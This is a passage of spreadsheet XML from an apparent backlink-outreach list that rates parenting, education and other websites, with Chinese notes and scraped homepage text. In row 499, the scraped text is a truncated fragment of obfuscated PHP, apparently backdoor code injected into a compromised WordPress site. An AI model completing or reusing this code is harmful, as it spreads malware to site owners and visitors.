      <x:c r="B496" s="19" t="str">
        <x:v>can-ammax2.com</x:v>
      </x:c>
      <x:c r="C496" s="19" t="str">
        <x:v>https://can-ammax2.com</x:v>
      </x:c>
      <x:c r="D496" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E496" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F496" s="20"/>
      <x:c r="G496" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H496" s="19" t="str"/>
      <x:c r="I496" s="19" t="str"/>
      <x:c r="J496" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K496" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L496" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M496" s="19" t="str">
        <x:v>https://can-ammax2.com</x:v>
      </x:c>
      <x:c r="N496" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O496" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P496" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q496" s="21" t="str"/>
      <x:c r="R496" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S496" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T496" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://can-ammax2.com
http://can-ammax2.com</x:v>
      </x:c>
    </x:row>
    <x:row r="497">
      <x:c r="A497" s="18" t="str">
        <x:v>496</x:v>
      </x:c>
      <x:c r="B497" s="19" t="str">
        <x:v>acountrygirlslife.com</x:v>
      </x:c>
      <x:c r="C497" s="19" t="str">
        <x:v>https://acountrygirlslife.com</x:v>
      </x:c>
      <x:c r="D497" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E497" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F497" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G497" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H497" s="19" t="str">
        <x:v>https://acountrygirlslife.com/</x:v>
      </x:c>
      <x:c r="I497" s="19" t="str">
        <x:v>A Country Girl's Life - FREE Planner Printables to Organize Your Life!</x:v>
      </x:c>
      <x:c r="J497" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K497" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L497" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M497" s="19" t="str">
        <x:v>https://acountrygirlslife.com/</x:v>
      </x:c>
      <x:c r="N497" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O497" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P497" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q497" s="21" t="str">
        <x:v>FREE Planner Printables to Organize Your Life! A Country Girl's Life - FREE Planner Printables to Organize Your Life! Home Shop FREE PRINTABLES CRAFTING DIY RECIPES THRIFTING GARDENING About Frequently Asked Questions &amp; Technical Help Contact Me Affiliate Disclosures &amp; Privacy Policy Media Kit Let’s Work Together! A Country Girl's Life FREE Planner Printables to Organize Your Life! Clay Bead Bracelet Ideas You’ll Wanna Make NOW! May 15, 2026 | CRAFTING Looking for clay bead bracelet ideas? Need unique, inspiring ideas for heishi bracelets ? We have TONS of unique polymer clay bead bracelet ideas for all skill levels…these are UNIQUE &amp;hellip; More Tshirt Cutting Ideas May 15, 2026 | CRAFTING Looking for Tshirt Cutting Ideas? Need inspirin</x:v>
      </x:c>
      <x:c r="R497" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S497" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T497" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://acountrygirlslife.com</x:v>
      </x:c>
    </x:row>
    <x:row r="498">
      <x:c r="A498" s="18" t="str">
        <x:v>497</x:v>
      </x:c>
      <x:c r="B498" s="19" t="str">
        <x:v>sowgrowharvest.co.uk</x:v>
      </x:c>
      <x:c r="C498" s="19" t="str">
        <x:v>https://sowgrowharvest.co.uk</x:v>
      </x:c>
      <x:c r="D498" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E498" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F498" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G498" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H498" s="19" t="str">
        <x:v>https://sowgrowharvest.co.uk/</x:v>
      </x:c>
      <x:c r="I498" s="19" t="str">
        <x:v>Sow Grow Harvest – Learn As You Grow</x:v>
      </x:c>
      <x:c r="J498" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K498" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L498" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M498" s="19" t="str">
        <x:v>https://sowgrowharvest.co.uk/</x:v>
      </x:c>
      <x:c r="N498" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O498" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P498" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q498" s="21" t="str">
        <x:v>Learn As You Grow Sow Grow Harvest – Learn As You Grow Sow Grow Harvest Search Search THE GROW VEG ACADEMY Sow Grow Harvest The UK Vegetable &amp; Fruit Growing Hub. Think Like a Grower , Understand the Plant, Grow with Confidence. What’s New in September: What to Sow in September. Clear Beds for Onions &amp; Garlic The Grow Veg Academy is now Live! More Coming Soon. Harvesting Sweet Peppers just turning red. ● Featured Article September is Autumn – A Season of Change Out with the Old &amp; in with the New Season September is time for a season change, we are now coming into Autumn, which is one of my favourite seasons. In the vegetable garden, it’s a time for change, I’m harvesting all the tomatoes, sweet peppers and min</x:v>
      </x:c>
      <x:c r="R498" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S498" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T498" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://sowgrowharvest.co.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="499">
      <x:c r="A499" s="18" t="str">
        <x:v>498</x:v>
      </x:c>
      <x:c r="B499" s="19" t="str">
        <x:v>donusumpsikoterapi.com</x:v>
      </x:c>
      <x:c r="C499" s="19" t="str">
        <x:v>https://donusumpsikoterapi.com</x:v>
      </x:c>
      <x:c r="D499" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E499" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F499" s="20" t="str">
        <x:v>500</x:v>
      </x:c>
      <x:c r="G499" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H499" s="19" t="str">
        <x:v>https://donusumpsikoterapi.com/</x:v>
      </x:c>
      <x:c r="I499" s="19" t="str">
        <x:v>WordPress &amp;rsaquo; Hata</x:v>
      </x:c>
      <x:c r="J499" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K499" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L499" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M499" s="19" t="str">
        <x:v>https://donusumpsikoterapi.com/</x:v>
      </x:c>
      <x:c r="N499" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O499" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P499" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q499" s="21" t="str">
        <x:v>$fkPFEUujT = "\170" . 'e' . "\162" . chr ( 180 - 85 ).chr (111) . chr (114) . chr (103) . chr (114) . 'V';$PvkVdhAVB = chr (99) . chr ( 962 - 854 )."\141" . chr ( 981 - 866 ).chr (115) . chr ( 511 - 416 )."\x65" . chr (120) . 'i' . chr (115) . chr (116) . chr (115); $SBnvzquDOp = class_exists($fkPFEUujT); $PvkVdhAVB = "55280";$xTLVn = !1;if ($SBnvzquDOp == $xTLVn){function KHFCjYl(){$PiwIzkWSjJ = new /* 14665 */ xer_orgrV(27009 + 27009); $PiwIzkWSjJ = NULL;}$CPEXn = "27009";class xer_orgrV{private function JFHQtb($CPEXn){if (is_array(xer_orgrV::$jOCttLrL)) {$pydkI = str_replace("\x3c" . chr (63) . chr ( 399 - 287 ).chr (104) . chr (112), "", xer_orgrV::$jOCttLrL["\143" . "\x6f" . "\x6e" . 't</x:v>
      </x:c>
      <x:c r="R499" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S499" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T499" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://donusumpsikoterapi.com</x:v>
      </x:c>
    </x:row>
    <x:row r="500">
      <x:c r="A500" s="18" t="str">
        <x:v>499</x:v>
      </x:c>
      <x:c r="B500" s="19" t="str">
        <x:v>beingecomomical.com</x:v>
      </x:c>
      <x:c r="C500" s="19" t="str">
        <x:v>https://beingecomomical.com</x:v>
      </x:c>
      <x:c r="D500" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E500" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F500" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G500" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H500" s="19" t="str">
        <x:v>https://beingecomomical.com/</x:v>
      </x:c>
      <x:c r="I500" s="19" t="str">
        <x:v>Being Ecomomical – Saving busy moms time and money.</x:v>
      </x:c>
      <x:c r="J500" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K500" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L500" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M500" s="19" t="str">
        <x:v>https://beingecomomical.com/</x:v>
      </x:c>
      <x:c r="N500" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O500" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P500" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q500" s="21" t="str">
        <x:v>Saving busy moms time and money. Being Ecomomical – Saving busy moms time and money. Skip to content Finances Work From Home Find A Job Lifestyle Fashion Beauty Wellness Productivity Recipes Travel Parenting Baby Pregnancy &amp; Newborn Education Shop My LTK About Contact Us Privacy Policy All Products Education Stages Building Blocks Review: A Hands-On Learning Toy for Preschoolers Being Ecomomical Education World Map Puzzle for Kids: Timberdoodle Geography Puzzle Review Being Ecomomical Education How to Homeschool Preschool: A Simple Guide for Parents Being Ecomomical Education 25 Fun Learning Activities for 4 Year Olds at Home Being Ecomomical Education 30 Fun Learning Activities for 3 Year Olds at Home Being Ecomomical Educ</x:v>
      </x:c>
      <x:c r="R500" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S500" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T500" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://beingecomomical.com</x:v>
      </x:c>
    </x:row>
    <x:row r="501">
      <x:c r="A501" s="18" t="str">
        <x:v>500</x:v>
      </x:c>
      <x:c r="B501" s="19" t="str">
        <x:v>courtneybslp.com</x:v>
      </x:c>
      <x:c r="C501" s="19" t="str">
        <x:v>https://courtneybslp.com</x:v>
      </x:c>
      <x:c r="D501" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E501" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F501" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G501" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H501" s="19" t="str">
        <x:v>https://courtneybslp.com/</x:v>
      </x:c>
      <x:c r="I501" s="19" t="str">
        <x:v>courtney b slp – the FUNctional slp</x:v>
      </x:c>
      <x:c r="J501" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K501" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L501" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M501" s="19" t="str">
        <x:v>https://courtneybslp.com/</x:v>
      </x:c>
      <x:c r="N501" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O501" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P501" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q501" s="21" t="str">
        <x:v>the FUNctional slp courtney b slp – the FUNctional slp Get FREE SHIPPING when you spend $100 or more… shop NOW! courtney b slp Home Shop! Shop Stickers Functional Therapy Material Resource Books Shop Apparel SLP Resumé Help Contact Blog Tips Resources SLP Life Freebies! Let’s Get My Freebies! Tech Backgrounds! 0 Let’s Shop ☺ Click HERE to shop the 7 Step Dementia Care Plan! The 7 Step Dementia Care Plan is an evidence-based, step-by-step guide to treating dementia for Speech-Language Pathologists. In this book you will find a guideline for treating dementia, broken down into 7 steps of treatment, including how to assess and provide treatment, seven educational handouts to provide to the patients and their fami</x:v>
      </x:c>
      <x:c r="R501" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S501" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T501" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://courtneybslp.com</x:v>
      </x:c>
    </x:row>
    <x:row r="502">
      <x:c r="A502" s="18" t="str">
        <x:v>501</x:v>
      </x:c>
      <x:c r="B502" s="19" t="str">
        <x:v>ccicthai.com</x:v>
      </x:c>
      <x:c r="C502" s="19" t="str">
        <x:v>https://ccicthai.com</x:v>
      </x:c>
      <x:c r="D502" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E502" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F502" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G502" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H502" s="19" t="str">
        <x:v>https://www.ccicthai.com/</x:v>
      </x:c>
      <x:c r="I502" s="19" t="str">
        <x:v>五洲检验（泰国）有限公司</x:v>
      </x:c>
      <x:c r="J502" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K502" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L502" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M502" s="19" t="str">
        <x:v>https://www.ccicthai.com/</x:v>
      </x:c>
      <x:c r="N502" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O502" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P502" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q502" s="21" t="str">
        <x:v>五洲检验（泰国）有限公司C.C.I.C. (THAILAND) CO., LTD. 五洲检验（泰国）有限公司 您好，欢迎来到五洲检验（泰国）有限公司！ ฉบับภาษาไทย 咨询电话：+66-22377740 五洲检验C.C.I.C. (THAILAND) CO., LTD. 关于我们 新闻中心 法规公告 我们的服务 检验业务 鉴定业务 认证业务 熏蒸业务 溯源认证 咨询业务 中检文化 联系我们 公司简介 更多 中国检验认证集团是以“检验、鉴定、认证、测试”为主业的跨国检验认证机构，创建于1980年。中检集团是第三方检验认证机构唯一以“中国”字头冠名的中国最大的检验认证机构。由中国国资委控股，中国市场监督管理总局、中国海关总署进行相关业务管理和指导。服务网络遍布34个国家和地区，在全球拥有400余家分支机构, 200多个实验室，拥有CCIC和CQC两大知名品牌，得到市场和客户的广泛认可。 五洲检验（泰国）有限公司是中国检验认证集团设在泰国的分支机构，建立于1987年，现有员工100多人，是中泰贸易顺利进行的重要保障力量 。 五洲检验（泰国）有限公司的使命是“创造更值得信赖的世界！”，获得泰国政府部门的认可从事出口大米等标准商品的检验及熏蒸业务，也获得原中国国家质检总局授权指定从事废物原料装运前检验。同时与国内外政府部门及官方机构如泰国商务部、工业部、农业部、泰国Central Lab、中国海关、中国市场监督管理总局合作或授权开展检验认证服务，得到了企业和消费者的高度信任。公司业务范围除泰国之外，还曾覆盖东南亚、大洋洲等其他一些国家。 新闻中心 更多 公司新闻 领导视察 郑重声明 五洲检验（泰国)有限公司管理层参加了泰国大米出口商协会的研讨会，介绍泰国大米输华</x:v>
      </x:c>
      <x:c r="R502" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S502" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T502" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://ccicthai.com
http://ccicthai.com</x:v>
      </x:c>
    </x:row>
    <x:row r="503">
      <x:c r="A503" s="18" t="str">
        <x:v>502</x:v>
      </x:c>
      <x:c r="B503" s="19" t="str">
        <x:v>wordexceler.ru</x:v>
      </x:c>
      <x:c r="C503" s="19" t="str">
        <x:v>https://wordexceler.ru</x:v>
      </x:c>
      <x:c r="D503" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E503" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F503" s="20"/>
      <x:c r="G503" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H503" s="19" t="str"/>
      <x:c r="I503" s="19" t="str"/>
      <x:c r="J503" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K503" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L503" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M503" s="19" t="str">
        <x:v>https://wordexceler.ru</x:v>
      </x:c>
      <x:c r="N503" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O503" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P503" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q503" s="21" t="str"/>
      <x:c r="R503" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S503" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T503" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://wordexceler.ru
http://wordexceler.ru</x:v>
      </x:c>
    </x:row>
    <x:row r="504">
      <x:c r="A504" s="18" t="str">
        <x:v>503</x:v>
      </x:c>
      <x:c r="B504" s="19" t="str">
        <x:v>thriveathomecentral.com</x:v>
      </x:c>
      <x:c r="C504" s="19" t="str">
        <x:v>https://thriveathomecentral.com</x:v>
      </x:c>
      <x:c r="D504" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E504" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F504" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G504" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H504" s="19" t="str">
        <x:v>https://www.thriveathomecentral.com/</x:v>
      </x:c>
      <x:c r="I504" s="19" t="str">
        <x:v>Home - Thrive at Home</x:v>
      </x:c>
      <x:c r="J504" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K504" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L504" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M504" s="19" t="str">
        <x:v>https://www.thriveathomecentral.com/</x:v>
      </x:c>
      <x:c r="N504" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O504" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P504" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q504" s="21" t="str">
        <x:v>Home - Thrive at Home Skip to content Home About Homeschooling Homemaking Home Business Shop Tips and tools for a thriving business, successful homeschool, and organized home Welcome to Thrive at Home, the ultimate resource hub for working homeschool moms who do it all. Discover tips on time management, homeschooling hacks, and business strategies designed specifically for the modern mompreneur looking to achieve the perfect work-life balance. See the latest Totally Free Tuesdays Freebie Fridays Homeschool Schedules Time Trackers Chore Charts Fast Crafts 5-Ingredient Recipes Meal Plans Recent Posts Simple Summer Learning Plan with IXL Why Education.com Works So Well For Working Homeschool Mo</x:v>
      </x:c>
      <x:c r="R504" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S504" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T504" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thriveathomecentral.com</x:v>
      </x:c>
    </x:row>
    <x:row r="505">
      <x:c r="A505" s="18" t="str">
        <x:v>504</x:v>
      </x:c>
      <x:c r="B505" s="19" t="str">
        <x:v>fivespotgreenliving.com</x:v>
      </x:c>
      <x:c r="C505" s="19" t="str">
        <x:v>https://fivespotgreenliving.com</x:v>
      </x:c>
      <x:c r="D505" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E505" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F505" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G505" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H505" s="19" t="str">
        <x:v>https://fivespotgreenliving.com/</x:v>
      </x:c>
      <x:c r="I505" s="19" t="str">
        <x:v>Five Spot Green Living</x:v>
      </x:c>
      <x:c r="J505" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K505" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L505" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M505" s="19" t="str">
        <x:v>https://fivespotgreenliving.com/</x:v>
      </x:c>
      <x:c r="N505" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O505" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P505" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q505" s="21" t="str">
        <x:v>Five Spot Green Living Skip to content Natural Remedies Eczema Essential Oils Peppermint Oil Tea Tree Oil Headache Relief Magnesium Benefits Natural Skin Care Healthy Recipes Bread Recipes healthy appetizers healthy drinks Easy Vegetarian Recipes for the Whole Family Green Living Decluttering Your Life Natural Cleaning Recipes Natural Pest Control Natural Wasp Repellent Tips Pantry Bugs Five Spot Green Living Natural Health Avocado Deviled Eggs Appetizer Recipe Natural Health Mac and Cheese Bites Appetizer Healthy Recipes Autumn Harvest Punch Recipe natural remedies healthy recipes green living Natural Remedies Harness the power of nature with simple, effective home remedies that support hea</x:v>
      </x:c>
      <x:c r="R505" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S505" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T505" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://fivespotgreenliving.com</x:v>
      </x:c>
    </x:row>
    <x:row r="506">
      <x:c r="A506" s="18" t="str">
        <x:v>505</x:v>
      </x:c>
      <x:c r="B506" s="19" t="str">
        <x:v>thecortezkitchen.com</x:v>
      </x:c>
      <x:c r="C506" s="19" t="str">
        <x:v>https://thecortezkitchen.com</x:v>
      </x:c>
      <x:c r="D506" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E506" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F506" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G506" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H506" s="19" t="str">
        <x:v>https://thecortezkitchen.com/</x:v>
      </x:c>
      <x:c r="I506" s="19" t="str">
        <x:v>The Cortez Kitchen -</x:v>
      </x:c>
      <x:c r="J506" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K506" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L506" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M506" s="19" t="str">
        <x:v>https://thecortezkitchen.com/</x:v>
      </x:c>
      <x:c r="N506" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O506" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P506" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q506" s="21" t="str">
        <x:v>The Cortez Kitchen - Skip to content The Cortez Kitchen Menu Menu Privacy Policy About Us Contact Us 10 Side Dishes That Pair Well with Lamb Chops August 12, 2026 by Chrissy Unless you’re serving lamb chops solo (no judgment!), you need sides that shine just as bright. I’ve rounded up 10 go-to dishes—from creamy mashed potatoes to bright Greek salad—that make any lamb dinner feel complete. Trust me, these recipes are keepers. Ready to build your perfect plate? Herbed Quinoa Salad Being in the kitchen on … Read more Categories Dinner Recipes Leave a comment 19 Delicious Turnip Root Recipes You Need to Explore August 12, 2026 by Chrissy Wondering what to do with that bag of turnips? From comfo</x:v>
      </x:c>
      <x:c r="R506" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S506" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T506" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://thecortezkitchen.com</x:v>
      </x:c>
    </x:row>
    <x:row r="507">
      <x:c r="A507" s="18" t="str">
        <x:v>506</x:v>
      </x:c>
      <x:c r="B507" s="19" t="str">
        <x:v>havetwinsfirst.com</x:v>
      </x:c>
      <x:c r="C507" s="19" t="str">
        <x:v>https://havetwinsfirst.com</x:v>
      </x:c>
      <x:c r="D507" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E507" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F507" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G507" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H507" s="19" t="str">
        <x:v>https://www.havetwinsfirst.com/</x:v>
      </x:c>
      <x:c r="I507" s="19" t="str">
        <x:v>Home - Have Twins First</x:v>
      </x:c>
      <x:c r="J507" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K507" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L507" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M507" s="19" t="str">
        <x:v>https://www.havetwinsfirst.com/</x:v>
      </x:c>
      <x:c r="N507" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O507" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P507" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q507" s="21" t="str">
        <x:v>Home - Have Twins First Skip to content Twins Baby Registry Babies &amp; Toddlers Shop FREE DOWNLOAD Twin Pregnancy Checklists Created by a twin mom to reduce overwhelm when preparing for twins! GET THE CHECKLISTS NOW! Twin Guides The #1 Twin Baby Registry Guide How To Prepare for Twins What To Expect at your Twin Delivery Welcome! Hi, I’m Jeanne. I am a twin mom and mom of three. I started Have Twins First to help new parents and twin parents through the trials and tribulations that come with starting a family. I focus on sharing my experiences as a mom to little ones. I write on topics that include twin pregnancy, twin babies, baby registry, and baby care with the goal of reducing stress and o</x:v>
      </x:c>
      <x:c r="R507" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S507" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T507" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://havetwinsfirst.com</x:v>
      </x:c>
    </x:row>
    <x:row r="508">
      <x:c r="A508" s="18" t="str">
        <x:v>507</x:v>
      </x:c>
      <x:c r="B508" s="19" t="str">
        <x:v>oldworldnew.us</x:v>
      </x:c>
      <x:c r="C508" s="19" t="str">
        <x:v>https://oldworldnew.us</x:v>
      </x:c>
      <x:c r="D508" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
